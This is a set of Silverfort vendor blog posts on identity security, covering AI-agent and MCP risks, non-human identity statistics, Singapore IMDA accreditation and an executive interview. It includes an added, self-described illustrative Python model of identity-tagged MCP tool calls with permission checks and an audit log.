To learn more about how to harden your Active Directory posture, download our guide “5 Ways to Step Up Your AD Hygiene.” --- - Published: 2025-06-18 - Modified: 2025-06-18 - URL: https://www.silverfort.com/blog/secure-your-ai-agents-with-silverforts-identity-first-innovation/ As organizations hurry to embrace AI and its many benefits, one challenge weighs heavily on the minds of CISOs and security teams: how do you quickly and effectively secure these new capabilities? Today, Silverfort introduces AI Agent Security, our latest innovation designed to empower CISOs to lead secure AI adoption by treating AI agents as identities—governed, visible, and protected with the same rigor applied to human users.

The emerging risk: AI agents left to their own devices

Gone are the days when only the most experimental companies adopted AI. Now, as executives across industries demand AI integration, it’s a business-critical priority. But while productivity soars, so do new risks. One area where these risks abound is the use of AI agents: software programs that perform tasks autonomously or on behalf of a human, often making decisions and taking actions based on context or input data. To perform these tasks, AI agents require a level of access to systems, resources and data, just like human users. And that's where the problem lies. AI agents exist in the grey area between human and non-human identities. They need a different type of protection, because current identity and access management (IAM) solutions simply weren’t built for machines that can make their own decisions. Those solutions lack visibility and effective governance capabilities for AI agents, leading to a substantial risk of misuse by threat actors, not to mention potential compliance violations and limited auditability. This creates a visibility and control vacuum.
CISOs, developers and identity teams urgently need solutions that seamlessly connect AI agents' identities and privileges to the human actors behind them, to ensure full visibility, compliance and risk management at the speed of innovation. Yet they are expected to secure a rapidly expanding AI ecosystem using tools that were never designed for it. Against a backdrop where expertise is still emerging, the pressure to move quickly is high, and AI agent behavior is evolving every day, it’s easy to see why the task at hand might feel impossible.

Our vision: Securing AI agents starts with treating them as an identity

Luckily, there’s a way forward. Our method for securing AI is built on a simple premise: AI agents must be treated as identities, and they should be tied to a person. At the core of this is a new definition of “who is doing the action”: not just a username or token, but the combined identity of the human and the AI agent acting on their behalf. With this identity-first approach, we can automatically discover, classify and monitor AI agent identities, apply dynamic access policies to each of them and, crucially, tie them to their human initiators. This lets you put governance and boundaries around autonomous agents, pull humans into the loop when appropriate, protect everyone involved with robust, real-time security controls, and prevent attackers from using AI agents for lateral movement. Even better, our identity-first architecture provides a single, end-to-end view of every AI agent and MCP server in action in your environment while being quick to deploy and implement. This means Silverfort can limit AI agent misuse, privilege escalation and unauthorized actions in your environment within hours of deployment.
In short, Silverfort’s AI Agent Security product:
- Discovers, classifies and monitors AI agents based on real-world behavior
- Ties every action to a responsible human to ensure accountability
- Enforces dynamic, least-privilege access policies tailored to each AI agent’s role
- Provides comprehensive auditability, enabling compliance in a shifting regulatory landscape
- Empowers organizations to securely adopt AI agents without requiring them to be AI experts
- Deploys rapidly to prevent key identity security threats in your environment with minimal effort

It’s the first solution that uses this unique architecture to reimagine identity security specifically for AI, significantly reducing the complexity and time required to safely and compliantly adopt AI technologies. With AI Agent Security, AI adoption is no longer a security compromise, but a secure, scalable strategy.

Built for businesses, backed by Silverfort

We’re just getting started. As the landscape evolves, Silverfort will continue to lead the way in pioneering technologies that help security leaders stay ahead of the curve. We're actively inviting Silverfort customers to become design partners and help shape the future of AI identity security. If you’re leading AI adoption and need to secure it fast, we want to work with you. Find out more and get a demo. --- - Published: 2025-06-13 - Modified: 2025-06-13 - URL: https://www.silverfort.com/blog/silverfort-is-now-the-only-imda-accredited-identity-security-platform-for-cloud-and-on-prem/ With the acquisition of Rezonate’s cloud-native capabilities and the launch of the new cloud NHI security capabilities, Silverfort is now the first and only IMDA-accredited identity security & threat detection platform for both cloud and on-prem environments, all in a single solution with real-time detection and enforcement. This level of unified coverage didn’t exist before. It does now, with Silverfort.
What it Means: Licensed to Protect Singapore’s Organizations

IMDA (Infocomm Media Development Authority) is Singapore’s lead agency driving digital transformation. It invests in digital infrastructure, shapes data security and telecom regulations, and fosters international collaboration. Earning IMDA accreditation is a significant achievement, as it signals regulatory trust and opens doors to priority projects with Singapore’s government and major enterprises, along with strong growth and expansion opportunities. Since the program’s inception 10 years ago, accredited companies have collectively raised over 1.2 billion SGD (approximately 1 billion USD) in new capital. To earn this accreditation, Silverfort underwent a rigorous evaluation across business, technical, financial, and operational use cases. Key to Silverfort’s success were several standout identity security capabilities: extending MFA protection to previously unprotected assets, securing Non-Human Identities (NHIs) with full visibility, real-time monitoring, and proactive detection and resolution of identity misconfigurations. By unifying visibility, access control, posture management, and real-time threat detection in a single platform, Silverfort delivers comprehensive protection across both human and non-human identities. This unified approach spans on-prem and cloud environments, enabling organizations to stay ahead of evolving threats without compromising flexibility or user experience.

Why it Matters: The Reality of Ransomware in Singapore

Ransomware in Singapore is a persistent and escalating threat. A survey conducted by the Singapore Cyber Security Agency (CSA) in 2023 found that over 80% of organizations experienced cyber incidents, often repeatedly, with ransomware as the most frequent type of attack. Of those affected, 99% reported major business disruptions, data loss, and reputational damage after being attacked.
According to official data, more than 130 cases of ransomware were reported to the CSA in 2022 alone. The real number, the CSA believes, could be much higher, since not every victim reports an attack. This national-level concern led to the creation of the Counter Ransomware Task Force (CRTF), commissioned to bring together government agencies from diverse fields to combat ransomware. Among its key recommendations: cyber insurance should play a central role in incentivizing stronger cybersecurity, particularly for ransomware defense. To qualify for cyber insurance coverage, or to maintain it, insurers now require, and rightfully so, that organizations meet baseline identity security standards. This means:
- Maintaining full visibility into human users and NHIs, including privileged accounts
- Knowing how those accounts are used, and whether they’re still needed
- Enforcing MFA across all admin accounts
- Monitoring privileged users and NHIs
- Detecting anomalies and misconfigurations such as shadow admins
- Providing evidence through dashboards, reports, or alerts showing continuous monitoring and enforcement

Although these requirements seem obvious to anyone who does not want to be hit by ransomware, they are also very difficult to meet. The first problem is that manually discovering all privileged accounts and NHIs is very challenging. The second problem is that many resources, such as legacy systems, command-line access and file shares, were not built to integrate modern security controls like MFA, or are too delicate to risk any change that may alter or break them. Silverfort is in a unique position to help organizations comply with cyber insurance requirements and prevent malicious access in real time without disruption.
Silverfort does this by delivering:
- Automatic discovery of all privileged and non-human identities
- MFA enforcement on systems that weren’t designed for it, including legacy systems and command-line access
- Continuous monitoring to spot misconfigurations like shadow admins or unused privileged accounts
- Real-time threat detection of all authentication and access attempts

Organizations using Silverfort’s platform have already reported improvements in their insurance eligibility, securing better coverage and lower premiums due to the comprehensive identity security measures in place. For example:
- West Valley School District strengthened the protection of both their user and service accounts, aligning with insurer expectations and reducing their premiums
- Optix gained full visibility into their service accounts and implemented access policies that helped close the security gaps highlighted in their insurance renewal process
- WBD enhanced their identity security posture across on-prem and cloud systems, enabling them to meet insurer requirements and maintain uninterrupted coverage

For these exact reasons Silverfort is also trusted by leading global cyber insurers such as AIG, Chubb, Sompo, Howden, and Marsh, as a strategic solution for meeting underwriting requirements and reducing identity threats.

The Path Forward: Silverfort + IMDA

Silverfort is the only identity security & threat detection platform accredited by Singapore’s IMDA, a major milestone that reinforces our credibility and commitment to securing highly regulated sectors like finance, energy, and telecom. A standout example is our successful deployment at Singtel, where Silverfort secured all on-prem systems without any operational disruption, demonstrating both the platform’s effectiveness and ease of adoption. This accreditation now applies to a platform that delivers identity security to all human and non-human identities across cloud IdPs, SaaS, and on-prem environments.
With real-time visibility, policy enforcement, and threat prevention, including blocking credential access and lateral movement, Silverfort empowers organizations to stay compliant and secure. For Singapore’s public sector and regulated industries, this isn’t just an advantage; it’s a practical path toward sustainable digital transformation and ongoing compliance. Want to learn more about how Silverfort can help you combat ransomware and comply with cyber insurance in Singapore? Talk to one of our local experts here. --- - Published: 2025-06-05 - Modified: 2025-06-04 - URL: https://www.silverfort.com/blog/fireside-chat-with-president-and-cro-howard-greenfield/ Cybersecurity and identity industry veteran Howard Greenfield joins Silverfort as President & CRO. We’re honored to welcome seasoned identity security go-to-market (GTM) leader Howard Greenfield to the Silverfort team. Bringing decades of experience in both cybersecurity and GTM leadership, Howard is equipped to bring our company to new heights as we deliver the first end-to-end identity security platform to customers. To learn more about Howard’s professional background, read the announcement. Pictured: Hed Kovetz, CEO & Co-founder, and Howard Greenfield, President & CRO. For this blog, we sat down with Howard to learn more about his vision, leadership approach, and what’s ahead for the company, our customers and partners, and overall strategy.

What drew you to this role at Silverfort and why?

I was drawn to Silverfort for multiple reasons, several of which are related to the main drivers of success in any business: team, TAM, and timing. The team: we have strong and engaged executives, investors, and employees committed to growing our business while preserving and scaling Silverfort’s unique company culture. The TAM (total addressable market): we have an unbelievably large addressable market that transcends barriers like company size, region, and industry.
This leads me to timing: “Identity” is now at the forefront of every cybersecurity team’s priority list, and Silverfort’s approach is distinctive. Our approach to identity is security-first and leverages unique and powerful technology, which complements what’s already in the market to enable our 1,000+ customers to take their identity security initiatives to the next level. Identity teams and security teams now overlap in multiple regards, all trying to figure out quickly how to better address identity security as it becomes a board-level discussion and concern. Lastly, Silverfort has reached rare levels of success – specifically relating to hypergrowth, strong customer retention and satisfaction, and a winning culture full of people who genuinely care about each other and value collaboration to accomplish shared goals.

What is your vision for the company in the next 2-3 years?

Building on my last answer, where I mentioned pivotal shifts happening in the identity space, here at Silverfort, in order to address key issues associated with identity security, we launched new products like Privileged Access Security (PAS) and Non-Human Identity (NHI) Security, which together with our other products create the broadest identity security offering in the market. These additions shifted our company from providing a few main value propositions to an end-to-end platform approach. Now, as an identity security platform, we’re focused on being well-versed in not only how our technology works, but how it’s actually implemented and used day-to-day to make our customers’ jobs easier while making their organizations more secure, and providing the insights and trends for customers to make better and faster decisions. It’s the difference between delivering solutions rather than just product features and functionality. We are going to continue growing the business fast, expanding our customer base and bringing more value to our existing customers.
Silverfort has already grown faster than other companies around us thanks to great product-market fit and execution, but I see major opportunities to improve and accelerate even further. Silverfort is well positioned to take the lead in the identity security category and build one of the largest companies in cybersecurity. Regarding our partner and consulting community, we’re all in – I see an opportunity to expand and grow that ecosystem even more. We’re going to expand our programs and empower partners to be the trusted advisors that identity and security teams rely on to achieve success.

Why identity security?

We’re at the forefront of cybersecurity for multiple reasons:
- Identity plays an increasingly bigger role in the market space – but between remote work, hybrid and complex environments, growth of interconnectivity, AI and more – getting a handle on the overall state of your organization’s environment is very difficult for most companies. To not only be compliance- and governance-driven, but also to be security-driven, requires looking at all dimensions of identity. No other company besides Silverfort understands every identity spanning from on-prem Microsoft AD all the way through to modern cloud-first architectures – we meet customers where they are and where they plan to be, all at the same time.
- Identity security is currently pieced together with point solutions. Some solutions focus only on detection and posture, others on specific elements of enforcement. Some focus just on non-human identities, or only privileged users, or just the cloud. Others offer identity security as a feature that is part of a broader offering, but don’t address it fully or deeply enough. Customers now seek a more unified approach; a platform focused on identity security end-to-end. It’s needed not only for better security, but also for cost reduction and consistent user experience.
- AI is coming in hot and fast – we're addressing AI identity security in a very innovative way that will help companies adopt agentic AI without worrying about AI agents accessing the wrong things or doing damage.

In the old days, identity security was just a ‘feature’ in the identity infrastructure. That was a reasonable approach when companies only had a single identity management solution. But now that enterprises manage their identities in various on-prem and cloud environments separately with different vendors, there’s a need for a dedicated security platform that can see and protect all these environments. We’re bringing the security arc over all of it, and there’s now a massive opportunity to shape what true identity security looks like and help our customers thrive.

How would you describe your leadership style, through the lens of being our President and CRO? How does that translate into shaping high-performing GTM teams?

It’s my job to equally satisfy and serve three distinct groups: employees, investors, and customers. Everything we do and deliver needs to have a meaningful impact across all three assemblies. Being that cybersecurity is a highly competitive market, along with the fact that identity is now at the center of modern security strategy, we need to keep raising the bar to deliver winning results to all stakeholders. To achieve that goal, I want us to be a team and a company that will do anything to win while still having the moral compass to choose the right path. Of course, winning doesn’t come without risk, and we need to find the areas where we’re willing to place bets and execute flawlessly. How do we make that possible? I am a big believer in giving teams lots of runway to build their business with flexibility but at the same time providing overarching pillars as a foundation. I want to ensure teams get the right insights so that individuals can do their jobs effectively while ultimately achieving corporate north stars.
How do you see our relationship with customers evolving under your leadership?

Open, ongoing communication with our customers about their feedback, priorities and the actual value they gain from the platform is key to realizing our vision, driving growth, and shaping the roadmap. I also want to be part of the evolution of customers’ maturity, meaning that we partner with our wider ecosystem (partners, consultants, technology alliances) to provide guidance. We want our customers to trust us to guide them on their entire cybersecurity journey, showing them how there are solutions we partner with that maximize a customer’s chances of achieving security and resilience. Now that Silverfort has evolved from offering specific products into a platform, being in the position to provide a singular GTM vision will empower us to focus on how we solve problems, which will positively impact the way we develop and deliver solutions. Our wider team, including myself, will stay close to customers and partners to keep advancing our platform forward and therefore the entire identity security landscape.

How do you plan to foster collaboration between marketing, sales, and customer success?

This is a huge benefit for me in that Silverfort doesn’t need much help in that arena, and I’m just excited to add to the momentum. I recently spent time with our Chief Marketing Officer and Chief Customer Officer, and I saw firsthand how our level of collaboration is solid and only getting stronger. We all agree on what’s universally important as a GTM engine and how we need to incorporate process, enablement, and insights so that we’re all moving in the same direction. I’m looking forward to helping the teams get even more aligned on our shared goals and helping each other be successful.

Any message you’d like to share with the team, customers, or partners as you begin this next chapter?

I’m thrilled to keep building and growing together while having fun along the way.
Thank you for the opportunity to be part of Silverfort's continued growth and success, the sky is the limit for us and I can’t wait to experience what’s ahead with all of you.

Welcome to Silverfort, Howard

With Howard's years of experience and strategy-minded approach, this decision is a benefit to both the Silverfort team and the wider identity security community. Interested in learning more about Howard’s experience and recommendations for the identity security space? Connect on LinkedIn to get the conversation started. --- - Published: 2025-06-05 - Modified: 2025-07-17 - URL: https://www.silverfort.com/blog/what-you-dont-know-about-your-identities-could-be-your-biggest-risk/ Have you ever considered that your biggest security risk might come from an account no one remembers exists? Identity has taken its place as the core security control, connecting users, systems and applications. That shift brings a new and growing challenge: most organizations don’t have a clear picture of all the identities in their environment and cannot answer a fundamental question: “Who has access to what, and why?” This lack of visibility isn’t just a blind spot, it’s a security risk. Without a complete understanding of the identity attack surface, organizations remain exposed to lateral movement, privilege misuse and access misconfigurations that accumulate quietly over time. In this blog, we’ll explore why visibility into identities and their access is foundational for reducing risk, and what organizations should prioritize to close the identity gap.

Where identity visibility breaks down

Many organizations struggle to maintain a centralized identity infrastructure. In most cases it ends up siloed across multiple systems. On-prem Active Directory (AD), cloud identity providers, standalone SaaS applications, and custom integrations: each part of the hybrid environment has its own identity model, roles, and permissions.
Managing them consistently across environments is a significant challenge. To simplify the user experience and reduce friction, many organizations have implemented federated access and single sign-on (SSO). These approaches allow users to log in once and gain access to multiple systems, regardless of where those systems are hosted, in the cloud or on-prem. From the end user’s perspective it feels seamless: one identity, one password, many apps. But alongside the convenience there is a hidden complexity and a dangerous side effect. Federated access often obscures the actual access paths and permissions behind each login. What looks unified on the surface is often fragmented in the back end. This fragmentation creates critical blind spots where access is granted but not fully understood, where identities persist without proper visibility, and where entitlements accumulate over time. These access gaps are exactly what attackers exploit to initiate lateral movement and privilege escalation. As environments grow more complex, achieving a unified view of identity becomes much harder and far more critical.

Why identity visibility is a must-have for any organization

You can’t manage what you can’t see, and that includes your identities. Without clear visibility into who has access to what, why they have that access, and how they’re using it, organizations are left making decisions in the dark. It’s not just a security gap; it’s a challenge that impacts governance, compliance and operational efficiency. When identity access data is fragmented, identity security controls become reactive and incident response is slowed by a lack of reliable context. End-to-end, real-time identity visibility changes that, and enables security and IAM teams to answer foundational questions: Who are the user accounts in our environment? What resources can they access? Why do they have those permissions, and are they still valid? Are they actively using that access, and is it excessive or stale?
This depth of clarity isn’t just helpful, it’s essential. It serves as the foundation for a range of critical IAM and security practices. With real-time insights into identities and their entitlements, organizations can confidently enforce the principle of least privilege by identifying and removing unnecessary access. Compliance teams can produce evidence-based reports that map users to roles, entitlements, and actual usage. And when an incident occurs, security teams have the full identity context they need to trace activity.

What organizations gain from identity visibility

Once organizations gain full visibility into their identity landscape, they can shift from reactive enforcement of security controls to a proactive identity security posture. It also unlocks several strategic advantages across both security and operations:
- Access mapping and risk reduction: a complete overview of who has access to what, and why. It allows organizations to find excessive, outdated or misaligned entitlements. This is the first step towards enforcing least privilege, reducing exposure of critical resources, and minimizing the identity attack surface.
- Operational efficiency: with enhanced visibility into access and usage patterns, organizations can speed up identity governance processes, including provisioning, deprovisioning, and role modeling. This increases process automation and reduces manual effort, which can significantly improve collaboration between IAM and security teams.
- Audit readiness and compliance: regulatory frameworks like HIPAA, NIST and SOC 2 all require strong access governance. When identity data is consolidated, audit teams can streamline the report creation process, quickly explain why access was granted, and close compliance gaps with more confidence.
- Incident investigation: when a malicious event occurs, the ability to trace an identity’s access history is critical.
Visibility into entitlements, authentication patterns, and resource usage gives security and IAM teams the context they need to understand what happened, how far it moved laterally, and how to respond effectively. These outcomes show that identity visibility isn’t a narrow technical capability. It’s a strategic approach that empowers organizations to manage access with greater clarity, reduce risk at scale, and operate with more confidence in complex hybrid or multi-cloud environments.

Identity visibility isn’t optional anymore

As hybrid environments continue to expand, organizations can no longer treat identity visibility as optional. It is the base for secure access, effective governance, and confident incident response. Without insight into access, even the most mature identity security programs will lack the context needed to operate effectively. The risks of fragmented visibility, including excessive access and undetected privilege escalation, are real and increasingly exploited. But with a complete understanding of identity access, both IAM and security teams can take control, reduce risk exposure, and strengthen identity governance. The path forward starts with a simple question: Do you really know who has access to what, and why? --- - Published: 2025-05-27 - Modified: 2025-05-27 - URL: https://www.silverfort.com/blog/beyond-the-hype-the-hidden-security-risks-of-ai-agents-and-mcp/ As AI rapidly evolves from a novelty to a necessity, businesses across every industry are feeling the pressure to integrate it into their operations, products, and services. What was once a forward-looking initiative has now become a critical component of staying competitive in a fast-changing market. Shopify’s CEO, Tobias Lütke, recently emphasized this shift by mandating that all employees actively use AI in their daily work, a bold signal that AI adoption is no longer optional.
Gone are the days when AI experimentation was driven solely by enthusiastic technologists or curious stakeholders—it’s now a strategic imperative. A significant component of this transformation is the use of AI agents: intelligent systems designed to autonomously perform tasks, make decisions, and adapt to changes in information.

In this post, we’ll define what AI agents are, introduce MCP (Model Context Protocol), and dive into the security risks that come with these emerging technologies.

### AI agents, defined: The brains behind autonomous applications

AI agents are applications where a Large Language Model (LLM) drives decisions, coordinates tasks, and adapts to changing inputs in real time. These aren’t just tools for conversation; they’re engines for action.

A true shift occurs when AI agents are equipped with the tools and services they need to interact with the digital world. Whether it's querying a database, sending a message, updating records, or triggering entire workflows, this tool access transforms AI into an autonomous process.

One of the most promising enablers of this evolution is the Model Context Protocol (MCP). Introduced by Anthropic in November 2024, MCP is an open, emerging standard that simplifies how AI agents connect to tools and data sources. It’s earning widespread attention for doing what the USB standard did for hardware peripherals: replacing complex, one-off integrations with a universal interface.

By standardizing tool access, MCP empowers AI agents to execute dynamic, context-aware tasks across platforms. For example, an AI agent using MCP could independently retrieve live financial data, generate updated internal reports, and initiate transactions based on predefined logic—all without human intervention or custom API development.

### How does MCP work?

MCP uses a familiar client-server architecture to standardize how AI agents interact with external tools and data sources.
This protocol ensures consistent and reliable communication between the agent and the resources it needs to function effectively.

In this setup, the MCP client lives within the host application, whether that’s an AI assistant, a coding environment, or any other AI-enabled application, and manages communication with an MCP server. As part of this process, the application and the connected tools negotiate protocol versions, discover available capabilities, and exchange requests and responses.

Source: Norah Sakal, https://norahsakal.com/blog/mcp-vs-api-model-context-protocol-explained/

What makes MCP unique is that these capabilities are described in natural language, which allows them to be accessed directly by the LLM driving the AI agent. This lets the model understand which tools are available and how to use them effectively.

The server uses URI-based patterns to manage access to its resources and supports concurrent connections, enabling multiple clients to interact with it simultaneously. This makes MCP highly scalable, flexible, and well-suited to complex agentic environments.

### Autonomous vs. delegated identity: A crucial distinction

As AI systems become more embedded in business and everyday life, defining and managing AI identities is becoming increasingly important. Two key models are emerging: autonomous AI identity and delegated (on-behalf-of, or OBO) identity.

Autonomous AI identity refers to an agent that operates independently, making decisions and taking action without real-time human intervention.

In contrast, a delegated identity represents an AI that performs tasks under the direction of a human. Understanding this distinction is crucial for maintaining proper accountability and security in AI-powered systems.

It is important to note that both models influence how systems manage authorization.
As an example, an autonomous AI might place an order for office supplies based on predefined purchasing limits and approval workflows. Meanwhile, an AI delegated by a human manager must comply with that manager's permissions, treating the manager as the authority. A failure to differentiate these roles can result in over-permissioned systems, security risks, or misattribution of actions.

### Visibility and control: The missing pieces

Real-time monitoring is essential for detecting and responding to anomalous behaviors in AI agents, especially as they operate autonomously and make decisions without human oversight. Just as important is robust identity management that clearly distinguishes between non-human identities (NHIs), which represent fully autonomous agents, and delegated identities, in which an agent acts on behalf of a human user.

Tagging each action with the correct identity context allows security teams to enforce least-privilege access, audit agent behavior against user delegations, and maintain clear accountability. Furthermore, tool-specific audit trails provide detailed records of every API call, data access, and action performed by an AI agent. These logs are essential for forensic investigations and compliance audits and should be integrated with existing SIEM systems to correlate agent activity across environments and detect suspicious activity.

As protocols like MCP expand tool integration capabilities, security frameworks must evolve in parallel, introducing dynamic authorization, continuous monitoring, and adaptive policy enforcement to manage increasingly capable agents. The combination of detailed audit trails and identity-aware monitoring will be critical to maintaining control, visibility, and trust as AI agents become more embedded in core operations.
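To make the two ideas above concrete (the client-server exchange MCP standardizes, and tagging every tool call with an autonomous or delegated identity so it can be authorized and audited), here is an added, in-process Python model. It is illustrative code written for this post, not Silverfort's product and not the official MCP SDK. The JSON-RPC 2.0 message shape and the `initialize`, `tools/list` and `tools/call` method names mirror MCP; the `_meta.identity` field carrying the agent and the on-behalf-of principal is a hypothetical convention, not part of the MCP specification; the tools, principals and permissions are constructed.

```python
"""Added example: an in-process model of an MCP-style client/server exchange with
identity-context tagging and a per-call audit trail. Illustrative code, not
Silverfort's product and not the official MCP SDK.

Assumptions (constructed for this example): messages are JSON-RPC 2.0 as in MCP and
the method names initialize / tools/list / tools/call mirror MCP's; the "_meta.identity"
field carrying the agent and on-behalf-of principal is a hypothetical convention, not
part of the MCP specification; tools, principals and permissions are constructed."""
import json
from dataclasses import dataclass, field
from typing import Optional

PROTOCOL_VERSION = "2025-03-26"  # constructed example value

# Constructed permission data: which principal may invoke which tool.
PERMISSIONS = {
    "agent:report-bot": {"get_financials", "write_report"},  # autonomous NHI
    "user:alice": {"get_financials"},                        # human manager
}

# Constructed tool catalogue; descriptions are natural language so the LLM can pick a tool.
TOOLS = {
    "get_financials": "Retrieve live revenue figures (stub).",
    "write_report": "Write an internal report (stub).",
    "place_order": "Initiate a purchase transaction (stub).",
}


def _rpc(rid, result=None, error=None) -> str:
    msg = {"jsonrpc": "2.0", "id": rid}
    msg["error" if error else "result"] = error or result
    return json.dumps(msg)


@dataclass
class ToolServer:
    """Hypothetical MCP-style server: negotiates a version, lists tools, runs tool calls."""
    negotiated: Optional[str] = None
    audit: list = field(default_factory=list)

    def handle(self, raw: str) -> str:
        req = json.loads(raw)
        method, params, rid = req["method"], req.get("params", {}), req.get("id")
        if method == "initialize":
            self.negotiated = params["protocolVersion"]  # version negotiation
            return _rpc(rid, {"protocolVersion": PROTOCOL_VERSION, "capabilities": {"tools": {}}})
        if method == "tools/list":  # capability discovery
            return _rpc(rid, {"tools": [{"name": n, "description": d} for n, d in TOOLS.items()]})
        if method == "tools/call":
            return _rpc(rid, self._call(params))
        return _rpc(rid, error={"code": -32601, "message": "method not found"})

    def _call(self, params: dict) -> dict:
        tool = params["name"]
        ident = params.get("_meta", {}).get("identity", {})
        agent, obo = ident.get("agent"), ident.get("on_behalf_of")
        # Delegated calls are authorized against the human's rights, autonomous ones against the agent's.
        principal = obo or agent
        allowed = tool in TOOLS and principal is not None and tool in PERMISSIONS.get(principal, set())
        # Every call is recorded with its identity context, whether allowed or denied.
        self.audit.append({
            "tool": tool, "agent": agent, "principal": principal,
            "mode": "delegated" if obo else ("autonomous" if agent else "unattributed"),
            "decision": "allow" if allowed else "deny",
        })
        if not allowed:
            return {"isError": True, "content": [{"type": "text", "text": f"{principal} may not call {tool}"}]}
        return {"isError": False, "content": [{"type": "text", "text": f"{tool} executed"}]}


def call_tool(server: ToolServer, rid: int, name: str, agent=None, on_behalf_of=None) -> dict:
    """Client side of tools/call: attach the identity context to the request."""
    identity = {k: v for k, v in {"agent": agent, "on_behalf_of": on_behalf_of}.items() if v}
    params = {"name": name, "arguments": {}, "_meta": {"identity": identity}}
    req = {"jsonrpc": "2.0", "id": rid, "method": "tools/call", "params": params}
    return json.loads(server.handle(json.dumps(req)))


def run_session() -> dict:
    """Drive a constructed session from the host's client side and return what was decided."""
    server = ToolServer()
    init = json.loads(server.handle(json.dumps(
        {"jsonrpc": "2.0", "id": 1, "method": "initialize", "params": {"protocolVersion": PROTOCOL_VERSION}})))
    listing = json.loads(server.handle(json.dumps({"jsonrpc": "2.0", "id": 2, "method": "tools/list"})))
    tools = [t["name"] for t in listing["result"]["tools"]]
    call_tool(server, 3, "write_report", agent="agent:report-bot")                             # autonomous: allowed
    call_tool(server, 4, "write_report", agent="agent:report-bot", on_behalf_of="user:alice")  # delegated: bounded by alice
    call_tool(server, 5, "get_financials", agent="agent:report-bot", on_behalf_of="user:alice")
    call_tool(server, 6, "place_order", agent="agent:report-bot")                              # no grant for this tool
    call_tool(server, 7, "get_financials")                                                     # no identity context at all
    return {"version": init["result"]["protocolVersion"], "tools": tools,
            "decisions": [(a["mode"], a["tool"], a["decision"]) for a in server.audit]}


if __name__ == "__main__":
    for row in run_session()["decisions"]:
        print(row)
```

The point to notice is the fourth call: the same agent that may write reports on its own is refused when it acts on behalf of a manager who lacks that right, which is exactly the "treat the manager as the authority" rule the post describes. The audit list is the tool-specific trail a SIEM would ingest; a call with no identity context is recorded as unattributed and denied rather than silently allowed.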
### Prepare now for secure AI adoption

As MCP rapidly gains traction as a standardized framework for integrating AI models with external tools and data sources, it’s reshaping how AI systems interact with applications and unlocking more dynamic, context-aware capabilities. The rapid adoption of this technology, however, has outpaced the development of mature security controls, exposing potential risks such as unauthorized access, data leakage, and compromised tool integrity.

To address these concerns, organizations are encouraged to take proactive steps:

- Audit current MCP usage or plans: Assess how MCP is currently implemented within your systems or how it’s planned to be integrated.
- Enhance visibility and standardize authentication: Implement standardized authentication protocols and ensure comprehensive identity tracking to monitor interactions between AI models and external tools.
- Foster collaboration between engineering and security teams: Encourage cross-functional teams to work together in developing and enforcing security policies tailored to MCP implementations.

By taking these steps, organizations can ensure that the integration of MCP enhances their AI capabilities without compromising security.

### Securing the future of AI agents

The use of AI agents is unlocking unprecedented efficiency and intelligence across applications, automating tasks, streamlining workflows, and enabling real-time decision making. But with any rapid advancement comes risk. Security practices have not been developed at the same pace as adoption, resulting in serious concerns regarding unauthorized access, data leakage, and misuse of identities.

To stay ahead of emerging threats, prioritize auditing your MCP deployments and implement standardized authentication protocols to establish a secure baseline.
Then build a comprehensive AI identity security strategy, leveraging third-party security tools to protect your systems as agents grow more autonomous and deeply integrated into core business operations.

Remember that security isn’t static—it must evolve with your AI stack.

---

- Published: 2025-05-22
- Modified: 2025-05-22
- URL: https://www.silverfort.com/blog/insecurity-in-the-shadows-the-data-that-proves-why-non-human-identities-are-a-cybersecurity-priority/

Most security programs are laser-focused on human users, including employees, contractors, and third parties. But there’s a parallel universe growing in scale and risk that remains largely invisible: non-human identities (NHIs). These are the service accounts, machine identities, scripts, applications, secrets, tokens and automation tools that keep our systems running. And they’re multiplying fast.

Adversaries don’t just hack people. NHIs are notoriously under-observed, under-protected and over-privileged—and their numbers are growing exponentially. Combine these four factors, and it’s easy to see why NHIs are prime targets for attackers seeking ways to slip through the cracks and move undetected through environments.

Our new research, Insecurity in the shadows: New data on the hidden risks of non-human identities, details the challenges organizations face in finding, securing and protecting NHIs. Deep analysis of billions of authentications across hundreds of organizations with millions of identities showed us that NHIs now outnumber human users by 50 to 1 in large organizations, and that 80% of those organizations have the kind of critical posture issues that expose them to common attack techniques. NHIs are challenging to find and harder to protect, making them heavily targeted by attackers and one of the most unprotected elements of the identity attack surface.
Read the full report here

(Figure: Data shows NHIs outnumber human identities by 50:1 and 40% of NHIs have an unknown owner)

### The highlights

- NHIs outnumber human identities by 50:1. This means that for every user an organization manages, there are dozens of silent NHIs operating in the background.
- 40% of cloud NHIs do not have an owner. These accounts are often excluded from proper lifecycle management, leaving them unobserved, unprotected, and open to abuse.
- Only 5.7% of organizations said they could accurately inventory all NHIs in their environment. Visibility remains the first—and possibly biggest—barrier to securing NHIs.
- 56% of organizations unknowingly sync their service accounts to their SaaS directory. This makes it possible for attackers who have accessed an organization’s on-prem environment to also—fairly easily—compromise its SaaS environment.
- 46% of service accounts still use the now-deprecated NTLM protocol to authenticate. Deprecated protocols are insecure protocols, making them easy targets.

### The key challenges of securing non-human identities

Despite their prevalence, power and usefulness, NHIs can be a thorn in identity and security teams’ sides. Silverfort’s research highlights four key problems that help explain why NHIs are such a major blind spot:

- They’re under-observed: NHIs operate behind the scenes, often without visibility or monitoring. In fact, 94.3% of organizations don’t have full visibility into their service accounts, let alone what they’re doing and what they’re accessing.
- They’re under-protected: NHIs rarely—if ever—benefit from the same security controls applied to human users. MFA cannot be enforced, and without full observability, behavior baselines cannot be established. Even more worryingly, many of them are stuck using insecure protocols: 46% of service accounts still use NTLM to authenticate, despite it being deprecated in mid-2024.
- They’re over-privileged: Many NHIs are granted far more access than they need, often with domain-level or administrative privileges that persist indefinitely. 35% of all user accounts are service accounts with high access privileges and low visibility, and 56% of organizations unknowingly sync more than half of their service accounts to their SaaS directory.
- They’re everywhere: NHIs span every environment—on-prem, hybrid, multi-cloud—and touch nearly every critical system. Since 2020, the ratio of NHIs to humans has grown from 10 to 1 to a staggering 50 to 1. Their ubiquity makes them both indispensable and hard to contain.

(Figure: Four reasons why NHIs are a security risk)

### Spotlight on one of the oldest, riskiest and most prolific NHIs: service accounts

Within the large pool of NHI types, service accounts—used for machine-to-machine communication within Microsoft Active Directory (AD) environments—have been overlooked by defenders but targeted by attackers. Traditional identity security controls are almost entirely human-centric, so service accounts simply couldn’t be protected in the traditional way.

Our data shows that 46% of service accounts regularly authenticate with NTLM, a deprecated authentication protocol with plenty of vulnerabilities. This year alone, several researchers have unveiled NTLM vulnerabilities. Attackers know this and use it to their advantage. You can read more about the countless attacks where NTLM is used here.

(Figure: Statistic showing how often service accounts authenticate with NTLM)

